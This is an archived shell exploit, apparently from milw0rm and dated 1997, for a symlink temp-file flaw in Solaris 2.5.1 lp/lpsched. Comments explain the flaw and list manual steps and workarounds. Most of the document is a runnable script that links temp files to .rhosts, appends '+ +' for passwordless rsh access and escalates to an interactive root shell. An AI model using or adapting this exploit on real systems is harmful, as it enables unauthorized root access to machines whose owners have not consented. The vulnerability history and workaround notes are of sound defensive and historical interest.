Solaris 2.5.1 lp / lpsched - Symlink

1. #!/bin/sh
2. #
3. # lpNet & temp file exploit:
4. #   break lp, then use lp priv to break root (or bin, etc...).
5. #
6. #   Written by: Chris Sheldon (csh@viewgraphics.com)
7. #
8. #   Tested on Solaris-2.5.1:
9. #     SunOS testhost 5.5.1 Generic sun4m sparc SUNW,SPARCstation-20
10. #
11. #   Caveat: This system is running without patches. Sun released
12. #     patch 103959-03 for 2.5.1 on Feb 27, 1997. lpNet and lpsched
13. #     were replaced in that patch, but the patch README does not
14. #     mention anything about a temp file or permissions problem.
15. #     103959-03 is in the recommended patch list, but not in the
16. #     "Patches containing security fixes" list.
17. #
18. #   This way (not using HP JetAdmin) *seems* to only work when you have
19. #   a postscript-only defined printer. If you send an ascii job to the
20. #   print queue, lpNet will invoke several of the /usr/lib/lp/postscript
21. #   programs to convert the ascii into postscript. One of them, postio(1),
22. #   creates a temp file in /var/tmp mode 666. If the request is sent from
23. #   a remote system (eg. handled by lpNet), then postio(1) runs as lp and
24. #   creates /var/tmp/<printer-name>.log as lp mode 666.
25. #
26. #   Here's part of the /var/lp/logs/request file:
27. #
28. #   = lp0-71, uid -1, gid -1, size 123, Sat May  3 03:26:14 PDT 1997
29. #   x /usr/lib/lp/postscript/postprint
30. #   y /usr/lib/lp/postscript/download -plp0|/usr/lib/lp/postscript/postio \
31. #       2>>$ERRFILE -L/var/tmp/lp0.log
32. #   t simple
33. #
34. #   What if you don't have a PS-only printer? Well, if you are using
35. #   the HP JetAdmin software and are running the hpnp daemon, then
36. #   you're just as vulnerable. The JetAdmin software creates a temp
37. #   file /var/tmp/jadump as lp with mode 666. It's happily follows
38. #   symlinks.
39. #
40. #   So, then exploit essentially is:
41. #     ln -s ~lp/.rhosts /var/tmp/<printer-name.log>
42. #      -or-
43. #     ln -s ~lp/.rhosts /var/tmp/jadump
44. #     rsh somehost lp somefile.txt
45. #     echo "+ +" >> ~lp/.rhosts
46. #     rsh -l lp localhost /bin/sh -i
47. #     mv /var/lp/logs/lpsched /var/lp/logs/lpsched.save
48. #     ln -s /.rhosts /var/lp/logs/lpsched
49. #     /usr/sbin/lpshut
50. #     /usr/lib/lpsched
51. #     mv /var/lp/logs/lpsched.save /var/lp/logs/lpsched
52. #     echo "+ +" >> /.rhosts
53. #     rsh -l root localhost /bin/sh -i
54. #
55. #  Note: This won't clobber the permissions on an existing /.rhosts
56. #    file, but you can always symlink to /usr/bin/.rhosts.
57. #
58. #  Workaround:
59. #    Put "umask 022" in /etc/init.d/lp. /var/tmp/<printer-name>.log
60. #      will be mode 644. This also makes /var/lp/logs/lpsched
61. #      created as mode 644.
62. #    For /var/tmp/jadump, the umask trick didn't work. I just made
63. #    /usr/spool/lp 755 root/root (was 775 lp/lp).
64. #
65. #  I suppose as a general principal, it's a good thing to go around
66. #  as root and touch /.rhosts /usr/bin/.rhosts /usr/spool/lp/.rhosts
67. #  and /var/adm/.rhosts as 600 root/root. I also run a script which
68. #  checks the files (and their contents) on a regular basis.
69. #
70. #  Perhaps there should be a file called /etc/rusers which, like the
71. #  /etc/ftpusers file, denies any user in that file password-less
72. #  r-service access.
73. #
74. #  Of course, you still have to worry about things like .forward.
75. #  A more draconian approach would be to change /var/spool/lp to
76. #  mode 755 and owned by root. What would this break?? (anything?)
77. #
78. #  This is the JetAdmin/hpnpd script:
79. #
80.  
81. #
82. # Usage stuff.
83. if [ "$1" = "" ]; then
84.   echo "Usage: lp-exp <remote-host> [remote printer name]"
85.   echo "         remote-host: host must have networked printer"
86.   echo "           with the main spool on the local system."
87.   exit
88. else
89.   remlp=$1
90. fi
91.  
92. #
93. # Specify a different queue
94. if [ "$2" != "" ]; then
95.   remqn=$2
96. fi
97.  
98. #
99. # Check for ~lp/.rhosts
100. if [ -f /usr/spool/lp/.rhosts ]; then
101.   echo "lp's .rhosts file exists... sorry"
102.   exit
103. fi
104.  
105. #
106. # Check if hpnpd is running
107. if [ "`ps -e | grep hpnpd`" != "" ]; then
108.   echo "found hpnpd running"
109.   rm -f /var/tmp/jadump
110.   ln -s /usr/spool/lp/.rhosts /var/tmp/jadump
111. else
112.   echo "If you have a postscript only printer, try that (see comments)."
113.   exit
114. fi
115.  
116. #
117. # print some data on a remote system
118. if [ "$remlp" = "" ]; then
119.   rsh $remlp "echo ASCII-STRING | lp"
120. else
121.   rsh $remlp "echo ASCII-STRING | lp -d$remqn"
122. fi
123.  
124. sleep 3
125.  
126. #
127. # Check for the new .rhosts file and break root
128. if [ -f /usr/spool/lp/.rhosts ]; then
129.   rm -f /var/tmp/jadump
130.   echo "+ +" >> /usr/spool/lp/.rhosts
131.  
132.   rsh -l lp localhost "rm /usr/spool/lp/.rhosts ;\
133.    mv /var/lp/logs/lpsched /var/lp/logs/lpsched.save ;\
134.    ln -s /.rhosts /var/lp/logs/lpsched ;\
135.    /usr/sbin/lpshut ;\
136.    sleep 3 ;\
137.    /usr/lib/lpsched ;\
138.    mv /var/lp/logs/lpsched.save /var/lp/logs/lpsched ;\
139.    echo \"+ +\" >> /.rhosts"
140. else
141.   echo "Hmmm... no .rhosts file was created."
142.   exit
143. fi
144.  
145. rsh -l root localhost /bin/sh -i
146.  
147. #
148. #
149. #
150.  
151. # milw0rm.com [1997-05-03]
152.